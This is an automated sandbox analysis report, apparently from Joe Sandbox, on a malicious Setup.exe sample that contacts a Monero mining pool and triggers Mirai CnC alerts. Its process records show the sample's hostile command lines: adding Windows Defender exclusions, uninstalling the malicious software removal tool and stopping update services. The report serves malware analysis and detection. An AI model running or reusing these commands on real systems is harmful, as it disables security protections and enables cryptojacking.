                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Windows\Temp\sidneyeifgjd.sys

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
                                                                                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14544
                                                                                                                                                                                                    Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: jeNQRsRgBe.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: RemiTool v2.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Sms OTP Bypass.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Win64.TrojanX-gen.27837.22565.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: xwizlLLNtX.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: gQZvXi6Osc.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: zLAr8hkDsu.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: udgE7Q3gs6.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                    Entropy (8bit):7.9999520848085055
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • ZIP compressed archive (8000/1) 100.00%
                                                                                                                                                                                                    File name:MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
                                                                                                                                                                                                    File size:4'442'123 bytes
                                                                                                                                                                                                    MD5:3384ccc27194a142f68c7ea1f157e2af
                                                                                                                                                                                                    SHA1:32644f4bf6678db76c9968fb048c8b3f78bb30ae
                                                                                                                                                                                                    SHA256:b892d9e7e59c6e61d99f8aeb1521b57567b821e10036d825648aebb66e754763
                                                                                                                                                                                                    SHA512:b396e132fe49196635c9f575f6e6cdf4413378d2b7220537eecbe3a120c755c736f245ceda863a970fdca12630719113c224c3ca374df22aba8161510c5d46a4
                                                                                                                                                                                                    SSDEEP:98304:RSsbQ+VoyemyiVJIAgAmbEg/a8uerMmYipUHr:EG3Vp15mWs5pUHr
                                                                                                                                                                                                    TLSH:EF26339EE80A193A91DC20494D6CCC4936B456128CD7863F060B3E5BE6BABE7375533F
                                                                                                                                                                                                    File Content Preview:PK........OgnXm.?.O.C...U...$.Setup.exe.. ..........6.P.v...6.P.v...6.P.v.........r.....D.....!.$...y....?Q.Y. ._.....B_F..R........G\.....J...2.X.=.^..f.."<w.i.t..z.<.......*.0|..T.u... t..........L..=..~.!..yb7..}....-+.;.yq.Jh.i..[..j.$.oW...hl.f.....r

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:1c1c1e4e4ececedc

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    03/14/24-13:56:00.164561TCP2841335ETPRO TROJAN ELF/Mirai Variant CnC Checkin5994222192.168.2.1445.144.165.227
                                                                                                                                                                                                    03/14/24-13:56:02.320789TCP2841335ETPRO TROJAN ELF/Mirai Variant CnC Checkin5994822192.168.2.1445.144.165.227
                                                                                                                                                                                                    03/14/24-13:56:00.878567TCP2841335ETPRO TROJAN ELF/Mirai Variant CnC Checkin5994422192.168.2.1445.144.165.227
                                                                                                                                                                                                    03/14/24-13:56:01.594395TCP2841335ETPRO TROJAN ELF/Mirai Variant CnC Checkin5994622192.168.2.1445.144.165.227

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.834031105 CET4970410128192.168.2.1644.196.193.227
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.927774906 CET101284970444.196.193.227192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.928154945 CET4970410128192.168.2.1644.196.193.227
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.928154945 CET4970410128192.168.2.1644.196.193.227
                                                                                                                                                                                                    Mar 14, 2024 13:59:54.021955967 CET101284970444.196.193.227192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 13:59:54.027618885 CET101284970444.196.193.227192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 13:59:54.082479000 CET4970410128192.168.2.1644.196.193.227
                                                                                                                                                                                                    Mar 14, 2024 14:00:11.727569103 CET4969680192.168.2.1672.21.81.240
                                                                                                                                                                                                    Mar 14, 2024 14:00:11.727715015 CET4969780192.168.2.1672.21.81.240
                                                                                                                                                                                                    Mar 14, 2024 14:00:11.814764977 CET804969672.21.81.240192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 14:00:11.814784050 CET804969772.21.81.240192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 14:00:11.814843893 CET4969680192.168.2.1672.21.81.240
                                                                                                                                                                                                    Mar 14, 2024 14:00:11.814861059 CET4969780192.168.2.1672.21.81.240
                                                                                                                                                                                                    Mar 14, 2024 14:00:35.693918943 CET101284970444.196.193.227192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 14:00:35.765631914 CET4970410128192.168.2.1644.196.193.227
                                                                                                                                                                                                    Mar 14, 2024 14:01:36.058617115 CET101284970444.196.193.227192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 14:01:36.109761953 CET4970410128192.168.2.1644.196.193.227
                                                                                                                                                                                                    Mar 14, 2024 14:02:06.922986984 CET101284970444.196.193.227192.168.2.16
                                                                                                                                                                                                    Mar 14, 2024 14:02:06.976794958 CET4970410128192.168.2.1644.196.193.227

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.720092058 CET5572653192.168.2.161.1.1.1
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.830224037 CET53557261.1.1.1192.168.2.16

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.720092058 CET192.168.2.161.1.1.10x66c6Standard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.830224037 CET1.1.1.1192.168.2.160x66c6No error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Mar 14, 2024 13:59:53.830224037 CET1.1.1.1192.168.2.160x66c6No error (0)monerooceans.stream44.196.193.227A (IP address)IN (0x0001)false

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:13:59:20
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff6a0810000
                                                                                                                                                                                                    File size:71'680 bytes
                                                                                                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                    Start time:13:59:25
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:13:59:31
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
                                                                                                                                                                                                    Imagebase:0x7ff605e50000
                                                                                                                                                                                                    File size:5'614'592 bytes
                                                                                                                                                                                                    MD5 hash:DF65134B0B2B2CC03F07647794B274E5
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:13:59:31
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs
                                                                                                                                                                                                    Imagebase:0x7ff7582a0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:13:59:31
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:13:59:32
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:13:59:32
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                    Imagebase:0x7ff7648e0000
                                                                                                                                                                                                    File size:329'504 bytes
                                                                                                                                                                                                    MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:13:59:32
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:13:59:35
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
                                                                                                                                                                                                    Imagebase:0x7ff605e50000
                                                                                                                                                                                                    File size:5'614'592 bytes
                                                                                                                                                                                                    MD5 hash:DF65134B0B2B2CC03F07647794B274E5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:13:59:40
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                    Imagebase:0x7ff7582a0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                    Start time:13:59:40
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    Imagebase:0x7ff6fd780000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\wusa.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    Imagebase:0x7ff7b1800000
                                                                                                                                                                                                    File size:345'088 bytes
                                                                                                                                                                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:30
